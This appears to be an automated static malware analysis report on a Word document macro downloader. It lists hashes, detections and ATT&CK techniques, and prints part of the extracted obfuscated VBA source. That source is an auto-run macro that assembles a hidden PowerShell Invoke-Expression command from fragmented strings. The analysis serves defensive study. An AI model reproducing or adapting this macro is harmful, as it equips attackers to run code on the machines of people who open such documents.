Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0e855f8b24bfe35…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 352.8 KB
Created: 2018-07-13 20:54:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: 397547783f0b69bdd778db38ca77b14f
SHA-1: 46ba12aa266d8f3a5c6fc908b07f8e14be3e082c
SHA-256: f0e855f8b24bfe35451a19dd69a23b84e04490e5ce76307a967c2eb63cd6e89f
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary code. This indicates an attempt to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6883060-0' further supports this downloader functionality. No specific malware family could be confidently identified.

Heuristics (6)

  • ClamAV: Doc.Downloader.Valyria-6883060-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6883060-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA macro code calls the Shell() function.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The document contains a Document_Open auto-execution macro.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic catches p-code-only documents and documents whose macro source could not be extracted, where no visible source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  44232 bytes
SHA-256: 1c67944da9831e9354710184591c3c391fdb463ef7949799ce8934ff3cd7711c

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "qSHjfPGQNnksV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   hLLOAW = NfIVW - phGKO + 80220 + XZFiS + (iJQvN / owkMf + 8617 - ROUiX * Uvunk / 3482 - 8935 + PLIGh)
   fraorn = TpQwbX - pfUoo + 65591 + iHFziU + (jGjkQJ / SfHIj + 23820 - fRXrT * oPiJf / 72937 - 81236 + kVqMTA)
   oqwjuK = FFVaGJ - FDvhN + 97647 + nWfuIA + (lcFwI / dXXucG + 73788 - pSJvvm * HNYTz / 95076 - 627 + QpmJI)
   BBOSaX = 52001 * LORBlj - ViLSau - REACr * QGpcZ / oMTfL / 52029 - uMjzJz
   fFqivu = 94684 * JRYfKV - Yobhr - BDzrjA * kGqEFc / AzwiJr / 54657 - OmvfZ
   GFqwd = 42451 * DhzQs - cMTLkJ - RuqZv * pOhwmw / fYvOL / 66597 - lAoBw
XfZiUfh = Application.Run("EwiZYpDaqsYdwL", "" + cziuifAFH + wDWwNNPdOhiLj + RLclFUw + VMkYoS + odVdXpdn + HvEDjFpp + hEGuNhTEcuC + UsvrrI + lYRhiiaTi + LjfZsd + pQUhjWV + JskaddffN + sizKiACJrOV + MUQBViEEsah + XpBARjKh + szffTRYiz + ojmvKWjdhTV + PDmjjFNG + HNbzozHaS + iPuCiCqm + FzDaUZijFZpwYA)
   QddJO = 60750 * BuaHmj - cWwRfU - iUMwQH * VnHnM / SqHhfO / 5005 - jQzjl
   oMvEbk = 55335 * IoLZHz - LTPld - nSVwp * iUlqt / mNdqGS / 40237 - GSfOJ
End Sub


Attribute VB_Name = "vhwiIYlIRMz"
Function RLclFUw()
On Error Resume Next
MNwCO = (58324 + 71887 + IZTKWR * KsvEoL) / (95628 + jVzal + 21403 + 72497)
VBnjXBtZE = "" + nNdvVOSZqMcU + BZdzdjPEOq + "PowE" + RDzcWZjYiEPO + mOUluMpbZLhl + "RsH" + Viznjnz + OpDkGnzKPcw + "ell " + jdvCrpi + kCiDAEchjjXoGv + "  " + Chr(34) + " " + jocBSJaDUwW + wHklTEABCns + "iEX" + sMZMchEaHBBm + cfiBikDncmC + " ( " + rahAjSlQNdIWp + oGiwrdX + "\" + Chr(34)
mKzdE = (70194 + JppNAa * 1395 * UqKPB + (ftzAz - DDvOT + MOZVI - 22986 - (56015 * wjzaDN * 10727 / iBSIV)))
   RzcFO = (67435 + ubtwO * 73317 * whwlKb + (tXzlQn - tvLiR + IVfGO - 15342 - (86085 * XjGzTY * 61306 / TWLTI)))
lWkCvQOzSpj = "" + TwvhAjiOwij + sXCiMVq + " $(" + wOtZboXwzltA + LLlrwsCoo + "SE" + bzIlwBlph + nbEtrwfwkBFH + "t-I" + aiswjHaqHA + MCjHLFOiX + "tEm" + EAEJpRQVrSOVW + ztHzTEEdlcPcq + " 'va" + LwPrnzfwkYriz + jMOUHUXaqizXSj + "RI" + ZVwHPFfFtSvWY + HinvCOWsZoY + "ab" + oZMRJjRI + ibhJapYABOIsp + "lE:o"
XbCdZT = (83349 + WQUFdM * 78870 * RItEU + (EwCAn - Kzwkh + lIOfZU - 83275 - (89207 * sFkvn * 24943 / rjvaQ)))
owstVdjLPbX = "" + aYfUVWU + wajvmiZNaK + "FS' " + SEzJHIMoHRjmI + pWYnYVN + " '"
jHEBW = (25578 + rKPITj * 22237 * OHvQf + (unhhjq - XnUEG + czELSt - 52719 - (83836 * twhIKK * 48842 / azTVl)))
   UmWnU = (44603 + DNtiOJ * 93982 * WEATtl + (bjrwW - HnRrfh + fXnXEz - 86411 - (37177 * cvPTw * 51157 / VSalT)))
DPTnkQqO = "" + VAAvacrjcFwwQc + sjMEviDzhXwYEw + "' " + hrBDzzslkM + wbwsEisnw + ") \"
nzDOC = (62633 + ffjdR * 48785 * KwvoaT + (upwFZD - ZEjVv + OGtjpF - 33232 - (63530 * iUKZR * 87297 / zwYSRs)))
dOUQj = "" + dczFbzIW + DEMwVCCmL + Chr(34) + " " + AmatHlzcZVzpaM + bjfMnqEpa + Chr(43) + " " + DQOFwaN + YLUOLtJrEPlms + "[S" + FfRHJilSWkt + PDONjmtQ + "TRiN" + AujMlLzOK + zQJFTInszdRhw + "g]["
AYCGr = (20941 + OQMdVz * 14165 * WjfXQ + (FHQdFX - njNil + KbLEpc - 12588 - (4361 * sqmolb * 13521 / BbLOvQ)))
   mniahz = (90219 + PwvKfq * 88841 * kMOaq + (mnjAL - ZVPKZ + DpcbLs - 90642 - (4913 * ojwDL * 64338 / iiBMm)))
dNvjL = "" + ujooKujklDnEh + WfoszHk + "ChAr" + ZXqhJMo + lhiEGrdIvKzXc + "[]] " + jfhwbEjJjo + EzbZOEQwbXRYw + "( 36" + LazcwDUAdfqGj + uQrEZIUlkS + " ,83"
tUdoID = UpKXr + Uidrj + cJWih * 88498 + CiEKH / XiFMRO
   uJNJB = OYjmM + jkwzt + whuDc * 2969 + rpjqpM / kfZrQ
aHJimk = "" + WAVTwAoG + LDtfWmvuiAqQ + " , " + qTdPSMc + UnWMOvZOb + "82 ," + wddDiZVUmwR + SciWZnoEzp + "106"
DtULP = wsvzva + XLzfv + GwawcK * 48152 + OwsDnw / znfiV
   AZhwJm = NBHNp + jsrIZ + CjAtl * 32460 + ooOYw / ELiAnV
VvURE = "" + tRcWQjAiUrnVLc + AqEiuCtIdOYYU + ", 61" + GADhhAoIENQ + zawWsnhf + " ,1" + AqYUsBIcNX + VIvNrMiAVdfh + "10" + SBfjPvk + rJfvGwl + " ,10" + uSFobfvVwWCXKq + jGzjHWwrFEEMQ + "1, 1" + jbfnpw
... (truncated)